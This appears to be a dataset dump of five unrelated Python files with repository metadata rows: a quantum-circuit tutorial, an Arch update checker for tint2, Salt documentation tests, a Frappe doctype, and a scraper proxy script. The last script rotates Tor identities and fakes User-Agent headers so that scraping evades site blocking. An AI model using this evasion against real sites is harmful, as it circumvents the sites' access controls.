return os.path.exists(out_path) | 33.984127 | 124 | 0.643624 | 293 | 2,141 | 4.443686 | 0.320819 | 0.041475 | 0.02765 | 0.029186 | 0.235023 | 0.184332 | 0.155146 | 0.109063 | 0.064516 | 0.064516 | 0 | 0.014042 | 0.234937 | 2,141 | 63 | 125 | 33.984127 | 0.78083 | 0.040168 | 0 | 0.133333 | 0 | 0 | 0.064783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.066667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3904fe36e254754cd9d0f734bd1f20cf48a463ed | 1,294 | py | Python | tutorials/source/1.parameterized_quantum_circuit.py | Takishima/mindquantum | e90dfe474b759023d7ae18281b9a87cb8d223d04 | [
"Apache-2.0"
] | null | null | null | tutorials/source/1.parameterized_quantum_circuit.py | Takishima/mindquantum | e90dfe474b759023d7ae18281b9a87cb8d223d04 | [
"Apache-2.0"
] | null | null | null | tutorials/source/1.parameterized_quantum_circuit.py | Takishima/mindquantum | e90dfe474b759023d7ae18281b9a87cb8d223d04 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2022 <Huawei Technologies Co., Ltd>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example of using a parameterized quantum circuit."""
import numpy as np
from mindquantum.core import RX, RY, RZ, Circuit, H, X, Y, Z
print('Gate name:', X)
X.matrix()
print('Gate name:', Y)
Y.matrix()
print('Gate name:', Z)
Z.matrix()
print('Gate name:', H)
H.matrix()
cnot = X.on(0, 1)
print(cnot)
rx = RX('theta')
print('Gate name:', rx)
rx.matrix({'theta': 0})
ry = RY('theta')
print('Gate name:', ry)
ry.matrix({'theta': np.pi / 2})
rz = RZ('theta')
print('Gate name:', rz)
np.round(rz.matrix({'theta': np.pi}))
encoder = Circuit()
encoder += H.on(0)
encoder += X.on(1, 0)
encoder += RY('theta').on(2)
print(encoder)
encoder.summary()
| 22.701754 | 76 | 0.673107 | 207 | 1,294 | 4.207729 | 0.468599 | 0.072331 | 0.104478 | 0.065442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015888 | 0.173107 | 1,294 | 56 | 77 | 23.107143 | 0.798131 | 0.510046 | 0 | 0 | 0 | 0 | 0.170732 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.074074 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39057e3e32745631eb166e612031e1b4eb2801c6 | 5,097 | py | Python | .executor/arch-package/t2ec-lib/arch-update.py | gh0zialfat1h/dotfiles | d9b3f93ea6301ec65ed8140b6c6180d7166f3623 | [
"MIT"
] | 3 | 2021-06-02T04:54:09.000Z | 2021-06-06T04:29:01.000Z | .executor/arch-package/t2ec-lib/arch-update.py | 0xft1h/dotfiles | d9b3f93ea6301ec65ed8140b6c6180d7166f3623 | [
"MIT"
] | null | null | null | .executor/arch-package/t2ec-lib/arch-update.py | 0xft1h/dotfiles | d9b3f93ea6301ec65ed8140b6c6180d7166f3623 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# _*_ coding: utf-8 _*_
"""
# Author: Piotr Miller
# e-mail: nwg.piotr@gmail.com
# Website: http://nwg.pl
# Project: https://github.com/nwg-piotr/tint2-executors
# License: GPL3
# Credits: RaphaelRochet/arch-update
# https://github.com/RaphaelRochet/arch-update
# Icon by @edskeye
Arguments [-C<aur_helper>] | [-U<aur_helper> <terminal>] | [menu] | -[O] [-N] | [-M<custom_name>]
[-C<aur_helper>] - check updates
[-U<terminal>,<aur_helper>] - your AUR helper name
[-O] - show pending updates as notification
[-N] - name instead of icon
[menu] - show context jgmenu
Dependencies: `pacman-contrib`
Optional: `pacaur` | `trizen` | `yay`, `jgmenu`
"""
import sys
import os
import subprocess
def main():
name = None
helper_name, terminal_name, helper_cmd, updates = "", "", "", ""
do_check, do_update, do_notify = False, False, False
tmp_file = os.getenv("HOME") + "/.arch-updates"
check_command = 'sh -c "checkupdates > ' + tmp_file
aur_check_commands = {'pacaur': 'pacaur check -q',
'trizen': 'trizen -Qqu -a',
'yay': 'yay -Qqu -a'}
if len(sys.argv) > 1:
for i in range(1, len(sys.argv)):
if sys.argv[i].upper() == '-O':
do_check = False
do_update = False
do_notify = True
break
elif sys.argv[1].upper() == "MENU":
show_menu()
break
if sys.argv[i].upper().startswith('-C'):
try:
helper_cmd = aur_check_commands[sys.argv[i][2::]]
except KeyError:
helper_cmd = ""
pass
if helper_cmd:
check_command += " && " + helper_cmd
check_command += ' >> ' + tmp_file + '"'
do_check = True
do_update = False
do_notify = False
if sys.argv[i].upper().startswith('-U'):
tools = sys.argv[i][2::].split(":")
terminal_name = tools[0]
try:
helper_name = tools[1]
except IndexError:
helper_name = "sudo pacman"
do_check = False
do_update = True
do_notify = False
if sys.argv[i].upper() == '-N':
name = "Upd:"
if sys.argv[i].upper().startswith('-M'):
name = sys.argv[i][2::]
if sys.argv[i].upper() == '-H' or sys.argv[i].upper() == '-HELP':
print("\nt2ec --update -C[aur_helper] | -U<terminal>[:aur_helper] | [-O] [-N] | [-M<custom_name>]\n")
print("-C[aur_helper] - (C)heck updates with pacman and optionally AUR helper")
print(" example: t2ec --update -Ctrizen\n")
print("-U<terminal>[:aur_helper] - (U)pdate in <terminal> with pacman or AUR helper")
print(" example: t2ec --update -Uxfce4-terminal:trizen\n")
print("-O - display saved pending updates as n(O)tification")
print("-N - print (N)ame instead of icon")
print("-M<custom_name> - print custom na(M)e instead of icon\n")
if do_check:
if name is not None:
os.system("echo Checking...")
else:
os.system("echo /usr/share/t2ec/refresh.svg")
os.system("echo ''")
subprocess.call(check_command, shell=True)
updates = open(tmp_file, 'r').read().rstrip()
num_upd = len(updates.splitlines())
if name is not None:
if num_upd > 0:
print(name + " " + str(num_upd))
else:
print("Up-to-date")
else:
if num_upd > 0:
os.system("echo /usr/share/t2ec/arch-icon-notify.svg")
os.system("echo " + str(num_upd))
else:
os.system("echo /usr/share/t2ec/arch-icon.svg")
os.system("echo ''")
if do_update:
command = terminal_name + ' -e \'sh -c \"' + helper_name + ' -Syu; echo Press enter to exit; read; killall -SIGUSR1 tint2\"\''
subprocess.call(command, shell=True)
if do_notify:
updates = open(tmp_file, 'r').read().rstrip()
notify(updates)
def notify(updates):
subprocess.call(
['notify-send', "Pending updates:", "--icon=/usr/share/t2ec/arch-update48.svg", "--expire-time=5000", updates])
def show_menu():
try:
subprocess.check_output("which jgmenu", shell=True)
except subprocess.CalledProcessError:
print("\nInstall jgmenu package, run `jgmenu init`\n")
return
t2ec_dir = os.getenv("HOME") + "/.t2ecol"
if not os.path.isdir(t2ec_dir):
os.makedirs(t2ec_dir)
if not os.path.isfile(t2ec_dir + "/menu-update.sh"):
subprocess.call(["cp /usr/lib/t2ec/menu-update.sh "+ t2ec_dir + "/menu-update.sh"], shell=True)
subprocess.call([t2ec_dir + '/menu-update.sh'], shell=True)
if __name__ == "__main__":
main()
| 33.313725 | 134 | 0.530116 | 616 | 5,097 | 4.261364 | 0.282468 | 0.034667 | 0.030476 | 0.034667 | 0.212952 | 0.14781 | 0.101333 | 0.045714 | 0 | 0 | 0 | 0.010647 | 0.318226 | 5,097 | 152 | 135 | 33.532895 | 0.744748 | 0.128899 | 0 | 0.227723 | 0 | 0.029703 | 0.244189 | 0.053035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029703 | false | 0.009901 | 0.029703 | 0 | 0.069307 | 0.108911 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3905bcd7408ea63d921f3109b9efc0c9b7cc46b6 | 21,558 | py | Python | tests/unit/test_doc.py | alexey-zhukovin/salt | 87382072abf353f3da62ae4e2d9fe1ba14344efa | [
"Apache-2.0"
] | 1 | 2021-09-06T00:14:04.000Z | 2021-09-06T00:14:04.000Z | tests/unit/test_doc.py | alexey-zhukovin/salt | 87382072abf353f3da62ae4e2d9fe1ba14344efa | [
"Apache-2.0"
] | 2 | 2021-04-30T21:17:57.000Z | 2021-12-13T20:40:23.000Z | tests/unit/test_doc.py | Kamatera/salt | ac960a3308617657d9d039dae9108e0045ab3929 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
tests.unit.doc_test
~~~~~~~~~~~~~~~~~~~~
"""
# Import Python libs
from __future__ import absolute_import
import collections
import logging
import os
import re
# Import Salt libs
import salt.modules.cmdmod
import salt.utils.files
import salt.utils.platform
from tests.support.runtests import RUNTIME_VARS
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
log = logging.getLogger(__name__)
class DocTestCase(TestCase):
"""
Unit test case for testing doc files and strings.
"""
@skipIf(True, "SLOWTEST skip")
def test_check_for_doc_inline_markup(self):
"""
We should not be using the ``:doc:`` inline markup option when
cross-referencing locations. Use ``:ref:`` or ``:mod:`` instead.
This test checks for reference to ``:doc:`` usage.
See Issue #12788 for more information.
https://github.com/saltstack/salt/issues/12788
"""
salt_dir = RUNTIME_VARS.CODE_DIR
if salt.utils.platform.is_windows():
if salt.utils.path.which("bash"):
# Use grep from git-bash when it exists.
cmd = "bash -c 'grep -r :doc: ./salt/"
grep_call = salt.modules.cmdmod.run_stdout(cmd=cmd, cwd=salt_dir).split(
os.linesep
)
os_sep = "/"
else:
# No grep in Windows, use findstr
# findstr in windows doesn't prepend 'Binary` to binary files, so
# use the '/P' switch to skip files with unprintable characters
cmd = 'findstr /C:":doc:" /S /P {0}\\*'.format(salt_dir)
grep_call = salt.modules.cmdmod.run_stdout(cmd=cmd).split(os.linesep)
os_sep = os.sep
else:
salt_dir += "/"
cmd = "grep -r :doc: " + salt_dir
grep_call = salt.modules.cmdmod.run_stdout(cmd=cmd).split(os.linesep)
os_sep = os.sep
test_ret = {}
for line in grep_call:
# Skip any .pyc files that may be present
if line.startswith("Binary"):
continue
# Only split on colons not followed by a '\' as is the case with
# Windows Drives
regex = re.compile(r":(?!\\)")
try:
key, val = regex.split(line, 1)
except ValueError:
log.error("Could not split line: %s", line)
continue
# Don't test man pages, this file, the tox or nox virtualenv files,
# the page that documents to not use ":doc:", the doc/conf.py file
# or the artifacts directory on nox CI test runs
if (
"man" in key
or ".tox{}".format(os_sep) in key
or ".nox{}".format(os_sep) in key
or "ext{}".format(os_sep) in key
or "artifacts{}".format(os_sep) in key
or key.endswith("test_doc.py")
or key.endswith(os_sep.join(["doc", "conf.py"]))
or key.endswith(os_sep.join(["conventions", "documentation.rst"]))
or key.endswith(
os_sep.join(["doc", "topics", "releases", "2016.11.2.rst"])
)
or key.endswith(
os_sep.join(["doc", "topics", "releases", "2016.11.3.rst"])
)
or key.endswith(
os_sep.join(["doc", "topics", "releases", "2016.3.5.rst"])
)
):
continue
# Set up test return dict
if test_ret.get(key) is None:
test_ret[key] = [val.strip()]
else:
test_ret[key].append(val.strip())
# Allow test results to show files with :doc: ref, rather than truncating
self.maxDiff = None
# test_ret should be empty, otherwise there are :doc: references present
self.assertEqual(test_ret, {})
def _check_doc_files(self, module_skip, module_dir, doc_skip, module_doc_dir):
"""
Ensure various salt modules have associated documentation
"""
salt_dir = RUNTIME_VARS.CODE_DIR
# Build list of module files
module_files = []
skip_module_files = module_skip
full_module_dir = os.path.join(salt_dir, *module_dir)
for file in os.listdir(full_module_dir):
if file.endswith(".py"):
module_name = os.path.splitext(file)[0]
if module_name not in skip_module_files:
module_files.append(module_name)
# Capture modules in subdirectories like inspectlib and rest_cherrypy
elif (
os.path.isdir(os.path.join(full_module_dir, file))
and not file.startswith("_")
and os.path.isfile(os.path.join(full_module_dir, file, "__init__.py"))
):
module_name = file
if module_name not in skip_module_files:
module_files.append(module_name)
# Build list of documentation files
module_docs = []
skip_doc_files = doc_skip
full_module_doc_dir = os.path.join(salt_dir, *module_doc_dir)
doc_prefix = ".".join(module_dir) + "."
for file in os.listdir(full_module_doc_dir):
if file.endswith(".rst"):
doc_name = os.path.splitext(file)[0]
if doc_name.startswith(doc_prefix):
doc_name = doc_name[len(doc_prefix) :]
if doc_name not in skip_doc_files:
module_docs.append(doc_name)
module_index_file = os.path.join(full_module_doc_dir, "index.rst")
with salt.utils.files.fopen(module_index_file, "rb") as fp:
module_index_contents = fp.read().decode("utf-8")
module_index_block = re.search(
r"""
\.\.\s+autosummary::\s*\n
(\s+:[a-z]+:.*\n)*
(\s*\n)+
(?P<mods>(\s*[a-z0-9_\.]+\s*\n)+)
""",
module_index_contents,
flags=re.VERBOSE,
)
module_index = re.findall(
r"""\s*([a-z0-9_\.]+)\s*\n""", module_index_block.group("mods")
)
# Check that every module has associated documentation file
for module in module_files:
self.assertIn(
module,
module_docs,
"module file {0} is missing documentation in {1}".format(
module, full_module_doc_dir
),
)
# Check that every module is listed in the index file
self.assertIn(
module,
module_index,
"module file {0} is missing in {1}".format(module, module_index_file),
)
# Check if .rst file for this module contains the text
# ".. _virtual" indicating it is a virtual doc page
full_module_doc_name = os.path.join(
full_module_doc_dir, doc_prefix + module + ".rst"
)
with salt.utils.files.fopen(full_module_doc_name) as rst_file:
rst_text = rst_file.read()
virtual_string = 'module file "{0}" is also a virtual doc page {1} and is not accessible'
self.assertNotIn(
".. _virtual",
rst_text,
virtual_string.format(module, doc_prefix + module + ".rst"),
)
for doc_file in module_docs:
self.assertIn(
doc_file,
module_files,
"Doc file {0} is missing associated module in {1}".format(
doc_file, full_module_dir
),
)
# Check that a module index is sorted
sorted_module_index = sorted(module_index)
self.assertEqual(
module_index,
sorted_module_index,
msg="Module index is not sorted: {}".format(module_index_file),
)
# Check for duplicates inside of a module index
module_index_duplicates = [
mod for mod, count in collections.Counter(module_index).items() if count > 1
]
if module_index_duplicates:
self.fail(
"Module index {0} contains duplicates: {1}".format(
module_index_file, module_index_duplicates
)
)
# Check for stray module docs
# Do not check files listed in doc_skip
stray_modules = set(module_index).difference(module_files + doc_skip)
if stray_modules:
self.fail(
"Stray module names {0} in the doc index {1}".format(
sorted(list(stray_modules)), module_index_file
)
)
stray_modules = set(module_docs).difference(module_files)
if stray_modules:
self.fail(
"Stray module doc files {0} in the doc folder {1}".format(
sorted(list(stray_modules)), full_module_doc_dir
)
)
def test_auth_doc_files(self):
"""
Ensure auth modules have associated documentation
doc example: doc/ref/auth/all/salt.auth.rest.rst
auth module example: salt/auth/rest.py
"""
skip_files = ["__init__"]
module_dir = ["salt", "auth"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "auth", "all"]
self._check_doc_files(skip_files, module_dir, skip_doc_files, doc_dir)
def test_beacon_doc_files(self):
"""
Ensure beacon modules have associated documentation
doc example: doc/ref/beacons/all/salt.beacon.rest.rst
beacon module example: salt/beacons/rest.py
"""
skip_files = ["__init__"]
module_dir = ["salt", "beacons"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "beacons", "all"]
self._check_doc_files(skip_files, module_dir, skip_doc_files, doc_dir)
def test_cache_doc_files(self):
"""
Ensure cache modules have associated documentation
doc example: doc/ref/cache/all/salt.cache.consul.rst
cache module example: salt/cache/consul.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "cache"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "cache", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_cloud_doc_files(self):
"""
Ensure cloud modules have associated documentation
doc example: doc/ref/clouds/all/salt.cloud.gce.rst
cloud module example: salt/cloud/clouds/gce.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "cloud", "clouds"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "clouds", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_engine_doc_files(self):
"""
Ensure engine modules have associated documentation
doc example: doc/ref/engines/all/salt.engines.docker_events.rst
engine module example: salt/engines/docker_events.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "engines"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "engines", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_executors_doc_files(self):
"""
Ensure executor modules have associated documentation
doc example: doc/ref/executors/all/salt.executors.docker.rst
engine module example: salt/executors/docker.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "executors"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "executors", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_fileserver_doc_files(self):
"""
Ensure fileserver modules have associated documentation
doc example: doc/ref/fileserver/all/salt.fileserver.gitfs.rst
module example: salt/fileserver/gitfs.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "fileserver"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "file_server", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_grain_doc_files(self):
"""
Ensure grain modules have associated documentation
doc example: doc/ref/grains/all/salt.grains.core.rst
module example: salt/grains/core.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "grains"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "grains", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_module_doc_files(self):
"""
Ensure modules have associated documentation
doc example: doc/ref/modules/all/salt.modules.zabbix.rst
execution module example: salt/modules/zabbix.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "modules"]
skip_doc_files = [
"index",
"group",
"inspectlib.collector",
"inspectlib.dbhandle",
"inspectlib.entities",
"inspectlib.exceptions",
"inspectlib.fsdb",
"inspectlib.kiwiproc",
"inspectlib.query",
"kernelpkg",
"pkg",
"user",
"service",
"shadow",
"sysctl",
]
doc_dir = ["doc", "ref", "modules", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_netapi_doc_files(self):
"""
Ensure netapi modules have associated documentation
doc example: doc/ref/netapi/all/salt.netapi.rest_cherrypy.rst
module example: salt/netapi/rest_cherrypy
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "netapi"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "netapi", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_output_doc_files(self):
"""
Ensure output modules have associated documentation
doc example: doc/ref/output/all/salt.output.highstate.rst
module example: salt/output/highstate.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "output"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "output", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_pillar_doc_files(self):
"""
Ensure pillar modules have associated documentation
doc example: doc/ref/pillar/all/salt.pillar.cobbler.rst
module example: salt/pillar/cobbler.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "pillar"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "pillar", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_proxy_doc_files(self):
"""
Ensure proxy modules have associated documentation
doc example: doc/ref/proxy/all/salt.proxy.docker.rst
module example: salt/proxy/docker.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "proxy"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "proxy", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_queues_doc_files(self):
"""
Ensure queue modules have associated documentation
doc example: doc/ref/queues/all/salt.queues.sqlite_queue.rst
module example: salt/queues/sqlite_queue.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "queues"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "queues", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_renderers_doc_files(self):
"""
Ensure render modules have associated documentation
doc example: doc/ref/renderers/all/salt.renderers.json.rst
module example: salt/renderers/json.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "renderers"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "renderers", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_returners_doc_files(self):
"""
Ensure return modules have associated documentation
doc example: doc/ref/returners/all/salt.returners.cassandra_return.rst
module example: salt/returners/cassandra_return.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "returners"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "returners", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_runners_doc_files(self):
"""
Ensure runner modules have associated documentation
doc example: doc/ref/runners/all/salt.runners.auth.rst
module example: salt/runners/auth.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "runners"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "runners", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_sdb_doc_files(self):
"""
Ensure sdb modules have associated documentation
doc example: doc/ref/sdb/all/salt.sdb.rest.rst
module example: salt/sdb/rest.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "sdb"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "sdb", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_serializers_doc_files(self):
"""
Ensure serializer modules have associated documentation
doc example: doc/ref/serializers/all/salt.serializers.yaml.rst
module example: salt/serializers/yaml.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "serializers"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "serializers", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_states_doc_files(self):
"""
Ensure states have associated documentation
doc example: doc/ref/states/all/salt.states.zabbix_host.rst
module example: salt/states/zabbix_host.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "states"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "states", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_thorium_doc_files(self):
"""
Ensure thorium modules have associated documentation
doc example: doc/ref/thorium/all/salt.thorium.calc.rst
module example: salt/thorium/calc.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "thorium"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "thorium", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_token_doc_files(self):
"""
Ensure token modules have associated documentation
doc example: doc/ref/tokens/all/salt.tokens.localfs.rst
module example: salt/tokens/localfs.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "tokens"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "tokens", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_tops_doc_files(self):
"""
Ensure top modules have associated documentation
doc example: doc/ref/tops/all/salt.tops.saltclass.rst
module example: salt/tops/saltclass.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "tops"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "tops", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
def test_wheel_doc_files(self):
"""
Ensure wheel modules have associated documentation
doc example: doc/ref/wheel/all/salt.wheel.key.rst
module example: salt/wheel/key.py
"""
skip_module_files = ["__init__"]
module_dir = ["salt", "wheel"]
skip_doc_files = ["index", "all"]
doc_dir = ["doc", "ref", "wheel", "all"]
self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
| 35.810631 | 105 | 0.583728 | 2,593 | 21,558 | 4.567682 | 0.127266 | 0.06822 | 0.050659 | 0.044326 | 0.481763 | 0.463441 | 0.443853 | 0.410757 | 0.250675 | 0.172155 | 0 | 0.003652 | 0.301466 | 21,558 | 601 | 106 | 35.870216 | 0.782854 | 0.244132 | 0 | 0.323171 | 0 | 0 | 0.126429 | 0.001396 | 0 | 0 | 0 | 0 | 0.018293 | 1 | 0.079268 | false | 0 | 0.030488 | 0 | 0.112805 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3906a98a261906d140cb30e83a28612005b970ab | 1,913 | py | Python | tailorpad/admin/doctype/product_options/product_options.py | LaganJ/Tailoring | 2c527e229871c5292a9ed7c92967219b756ba99d | [
"MIT"
] | 2 | 2022-03-21T18:09:21.000Z | 2022-03-22T05:47:50.000Z | tailorpad/admin/doctype/product_options/product_options.py | LaganJ/Tailoring | 2c527e229871c5292a9ed7c92967219b756ba99d | [
"MIT"
] | null | null | null | tailorpad/admin/doctype/product_options/product_options.py | LaganJ/Tailoring | 2c527e229871c5292a9ed7c92967219b756ba99d | [
"MIT"
] | 1 | 2022-03-28T14:28:13.000Z | 2022-03-28T14:28:13.000Z | # Copyright (c) 2022, White Hat Global and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import cint, cstr
from frappe.model.document import Document
class ProductOptions(Document):
def validate(self):
self.duplicate_product_default()
self.atleast_one_default()
def duplicate_product_default(self):
product_dict = {}
for product in self.product_fields:
pass
# if cint(style.default) == 1 and style_dict.count(style.style_field):
# frappe.msgprint("inside")
def atleast_one_default(self):
has_default = set([d.product_field for d in self.product_fields if d.default])
product_fields = set([d.product_field for d in self.product_fields])
if len(has_default) != len(product_fields):
for d in product_fields:
if d not in has_default:
frappe.throw(_("At least one default product name is required for product {0}").format(d))
product = []
for d in self.get('product_fields'):
if d.product_field in product and d.default:
frappe.throw(("You Cannot Select Product {0} Default Multiple Times".format(d.product_field)))
if d.default:
product.append(d.product_field)
def on_update(self):
for d in self.product_fields:
name = frappe.db.get_value('Product Name', d.product_option, 'name')
if not name:
doc = make_product_name(d.product_field, d.product_option)
else:
doc = frappe.get_doc('Product Name', name)
products = [e.product_field for e in doc.products]
if d.product_field not in products:
doc.append('products', {
'product_field': d.product_field
})
doc.save(ignore_permissions=True)
def make_product_name(product_field, product_option):
doc = frappe.get_doc({
'doctype': 'Product Name',
'product_name': product_option,
'product': product_field
}).insert(ignore_permissions=True)
return doc | 32.982759 | 98 | 0.738108 | 283 | 1,913 | 4.791519 | 0.293286 | 0.106195 | 0.076696 | 0.056047 | 0.077434 | 0.077434 | 0.060472 | 0.060472 | 0.060472 | 0.060472 | 0 | 0.004342 | 0.157344 | 1,913 | 58 | 99 | 32.982759 | 0.836849 | 0.102457 | 0 | 0 | 0 | 0 | 0.124927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0.021739 | 0.108696 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3912b626fb6eea72b992a53c272a97d250910d77 | 871 | py | Python | instagram_scraper/proxy.py | smb-h/instagram-scraper | 7c9a5ec99b825ed975b4acc71c970f0853e82eb4 | [
"Unlicense"
] | null | null | null | instagram_scraper/proxy.py | smb-h/instagram-scraper | 7c9a5ec99b825ed975b4acc71c970f0853e82eb4 | [
"Unlicense"
] | 3 | 2022-01-13T04:22:06.000Z | 2022-03-12T01:04:48.000Z | instagram_scraper/proxy.py | smb-h/instagram-scraper | 7c9a5ec99b825ed975b4acc71c970f0853e82eb4 | [
"Unlicense"
] | 1 | 2021-04-27T07:59:28.000Z | 2021-04-27T07:59:28.000Z | import requests
from stem import Signal
from stem.control import Controller
from fake_useragent import UserAgent
import random, time
headers = { 'User-Agent': UserAgent().random }
print(requests.get('https://ident.me', headers=headers).text)
proxies = {
'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'
}
print(requests.get('https://api.ipify.org', proxies=proxies, headers=headers).text)
wait = random.uniform(0, 5)
print("wait : " + str(wait))
time.sleep(wait)
# signal TOR for a new connection
# https://stackoverflow.com/questions/30286293/make-requests-using-python-over-tor
def renew_connection():
with Controller.from_port(port = 9051) as c:
c.authenticate(password="password")
c.signal(Signal.NEWNYM)
renew_connection()
print(requests.get('https://api.ipify.org', proxies=proxies, headers=headers).text)
